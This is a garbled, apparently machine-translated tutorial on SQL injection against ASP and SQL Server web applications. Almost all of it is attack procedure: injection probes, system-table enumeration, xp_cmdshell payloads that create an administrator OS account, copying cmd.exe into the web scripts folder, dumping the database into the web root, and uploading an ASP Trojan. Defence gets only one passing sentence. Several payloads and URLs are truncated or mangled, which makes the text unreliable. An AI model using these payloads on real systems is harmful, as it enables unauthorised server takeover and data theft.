SQL injection attacks
SQL injection attack is one of the common means of hacking attacks on the database. With the development of B / S mode application development, the use of this model programmers to write applications more and more.
However, due to the level and experience programmers also uneven, a significant portion of programmers writing code, not the legitimacy of data input to the user to judge, so that the application security risks exist. Users can submit some database query code, according to the results of the program returns, access to certain data he wants to learn, which is called SQL Injection, that is SQL injection.
Chinese name of the SQL injection attacks the body content of the database hacker attack attributes common means
- 1 injection Introduction
- 2 general idea
- 3 responses
▪ SQL injection vulnerability judge
▪ analysis database server type
▪ executable situation
▪ find WEB virtual directory
▪ Upload ASP Trojan
▪ obtain system administrator privileges
▪ several special means
5 attack background
6 Common injection tool
▪ ah d injection tools
▪ Ming Kid
7 Network Analysis
8 How to prevent
SQL injection is the WWW from the normal port access, and the surface looks like normal Web page access
Prevent SQL injection attacks
No difference, so the market will not firewall alerts SQL injection, if the administrator did not view the habit ⅡS logs, may be invaded for a long time will not be found. However, SQL injection was quite flexible when the injection will encounter many unexpected cases, cleverly constructed SQL statement to successfully obtain the desired data.
The general idea
· Find SQL injection position;
· Determine the type of back-end database;
· Identify executable situation XP_CMDSHELL
Discovering WEB virtual directory
· Upload ASP Trojan;
· Obtain administrator rights;
From the safety techniques, it can be achieved through SQL injection attack prevention firewall database, because SQL injection attacks are often used to attack through the application, you can use virtual patching technology for SQL injection attack feature recognition, real-time attack blocking .
Attack steps to edit
SQL injection vulnerability judge
In general, SQL injection is generally present in the form: HTTP: //xxx.xxx.xxx/abc.asp id = XX, etc. with parameters?
SQL injection attacks
The ASP dynamic pages, and sometimes a dynamic Web page may have only one parameter, sometimes there may be N arguments, sometimes integer parameters, sometimes string parameter, can not be generalized. In short as long as the dynamic page and this page with access to the database parameter, then it is possible SQL injection. If there is no security awareness ASP programmer, do not make the necessary character filtering, the possibility of the existence of SQL injection is very large.
In order to fully understand the dynamics of pages of information to answer, please adjust the configuration of choice for the IE. The IE menu – Tools -Internet Options – Advanced – Show friendly HTTP error messages before removing the hook.
To illustrate the problem clearly, the following example to HTTP://xxx.xxx.xxx/abc.asp?p=YY analysis, YY may be an integer, there may be strings.
Analyzing ⒈ integer argument
When the input parameter YY when integer, usually abc.asp original SQL statement is as follows:
select * from table where field = YY, so you can use the following steps to test the existence of SQL injection.
①HTTP: //xxx.xxx.xxx/abc.asp p = YY ‘(add a single quotation mark), then the SQL statement into a abc.ASP?
select * from table where field = YY ‘, abc.asp abnormal operation;webSQL injection attacks statistical analysis
webSQL injection attacks statistical analysis
②HTTP: //xxx.xxx.xxx/abc.asp p = YY and 1 = 1, abc.asp operating normally, but with the same result HTTP://xxx.xxx.xxx/abc.asp?p=YY run? ;
③HTTP: //xxx.xxx.xxx/abc.asp p = YY and 1 = 2, abc.asp abnormal operation;?
Analyzing ⒉ string parameters
YY When the input parameter is a string, it is usually abc.asp original SQL statement is as follows:
select * from table where field = ‘YY’, so you can use the following steps to test the existence of SQL injection.
①HTTP: //xxx.xxx.xxx/abc.asp p = YY ‘(add a single quotation mark), then abc.ASP the SQL statement into a?
select * from table where field = YY ‘, abc.asp abnormal operation;
②HTTP: //xxx.xxx.xxx/abc.asp p = YY & nb … 39; 1 ‘=’ 1 ‘, abc.asp operating normally, but with HTTP://xxx.xxx.xxx/abc.asp? ? p = YY run the same result;
③HTTP: //xxx.xxx.xxx/abc.asp p = YY & nb … 39; 1 ‘=’ 2 ‘, abc.asp abnormal operation;?
If the above three steps to meet the full, abc.asp SQL injection vulnerability exists in some.
⒊ handle special cases
Sometimes programmers ASP programmers will filter out characters such as single quotes to prevent SQL injection. In this case you can try the following ways.
① Size set mixing: Since VBS is not case sensitive, and programmers all filters filter usually either uppercase strings, or all lowercase string filter, and mixed case tends to be overlooked. As with SelecT instead of select, SELECT and the like;
stored all the library names, as well.
Here I put our useful field names and instructions to everyone listed. name // represents the name of the library.
dbid // represents library ID, dbid from 1-5 is the system. They are: master, model, msdb, mssqlweb, tempdb five libraries. With select * from master.dbo.sysdatabases you can check out all the library names.
Sysobjects: within SQL-SERVER has this system, each database table that holds all objects created within the database, such as constraints, defaults, logs, rules, stored procedures, one row for each object in the table.
syscolumns: each table and view one row for each column in the table, a stored procedure for each parameter in the table also accounted for his party. The table is in each database. The main fields are:
name, id, colid: namely, field names, table ID number, ID number field, which is just on the ID we get sysobjects table ID number.
Use: select * from ChouYFD.dbo.syscolumns where id = 123456789 get ChouYFD this library, table ID is 123456789 in the list of all the fields.
If the current connection data account with SA rights and master.dbo.xp_cmdshell extended stored procedure (call this stored procedure can use the operating system shell) can be performed properly, the entire computer can be completely controlled in several ways, the future of All steps can be saved
⒈HTTP: //xxx.xxx.xxx/abc.asp p = YY & nb … er> 0 abc.asp execution exception but you can get the current connection to the database user name (if the display dbo represents SA)?.
⒉HTTP: //xxx.xxx.xxx/abc.asp p = YY … me ()> 0 abc.asp execution exception but you can get the name of the currently connected database?.
⒊HTTP: //xxx.xxx.xxx/abc.asp p = YY; exec master..xp_cmdshell “net user aaa bbb / add” – (master SQL-SERVER is the primary database; the name of the semicolon SQL? -SERVER semicolon before executing the statement name, and continue to implement its statement later; “-” sign is a comment indicating everything behind it is only a comment, the system does not perform) can directly increase the operating system account aaa, password bbb.
⒋HTTP: //xxx.xxx.xxx/abc.asp p = YY; exec master..xp_cmdshell “net localgroup administrators aaa / add” – just increase the aaa added to the administrators group account?.
⒌HTTP: //xxx.xxx.xxx/abc.asp p = YY; backuup database name of the database to disk =?: Data content ‘c \ inetpub \ wwwroot \ save.db’ put all get backed up to the WEB directory HTTP then download the file (of course, preferred to know WEB virtual directory).
⒍ create UNICODE vulnerability by copying CMD
HTTP://xxx.xxx.xxx/abc.asp?p=YY;exe … dbo.xp_cmdshell “copy c: \ winnt \ system32 \ cmd.exe c: \ inetpub \ scripts \ cmd.exe” will manufacture a UNICODE vulnerability, by using the method of this vulnerability, we completed the entire computer control (of course, preferred to know WEB virtual directory).
WEB virtual directory found
WEB virtual directory only to find, in order to determine the location placement ASP Trojan, and then get the USER permission. There are two methods more effective.
One guess based on experience, in general, WEB virtual directory is: c: \ inetpub \ wwwroot; D: \ inetpub \ wwwroot; E: \ inetpub \ wwwroot, etc., and the executable virtual directory is: c: \ inetpub \ scripts; D: \ inetpub \ scripts; E: \ inetpub \ scripts and so on.
Second, traversing the directory structure of the system, analyze the results and found that WEB virtual directory;
Create a temporary table: temp
HTTP://xxx.xxx.xxx/abc.asp?p=YY;create&n … mp (id nvarchar (255), num1 nvarchar (255), num2 nvarchar (255), num3 nvarchar (255)); – –
⑴ use xp_availablemedia to get all current drive and stored in temp table:
… nbsp; TestDB.dbo.temp)> 0 to get the table TEMP value recorded in the first of the id field, and the integer Compare, apparently abc.asp working properly, but they can be found in the exception value id field. Suppose we found that table name is xyz, then
Under the so-called ASP Trojan, is there some special features of ASP code and put WEB virtual directory Scripts, remote IE customers can implement it, and then get the USER permissions system to achieve initial control of the system. Upload ASP Trojan general, there are two more effective methods:
⒈ use WEB remote management capabilities
Many WEB sites, in order to maintain the convenience, provides remote management functions; there are many WEB SITE, its content is for different users have different access rights. In order to achieve control of user rights, there is a page that requires a user name and password, just enter the correct values to the next step of the operation can be achieved on the WEB management, such as upload, download files, directories, browse, modify configuration.
Therefore, if for the correct user name and password, not only can upload ASP Trojan, sometimes even directly USER privilege and browsing system, the last step of a complex operation “discovery WEB virtual directory” can be omitted.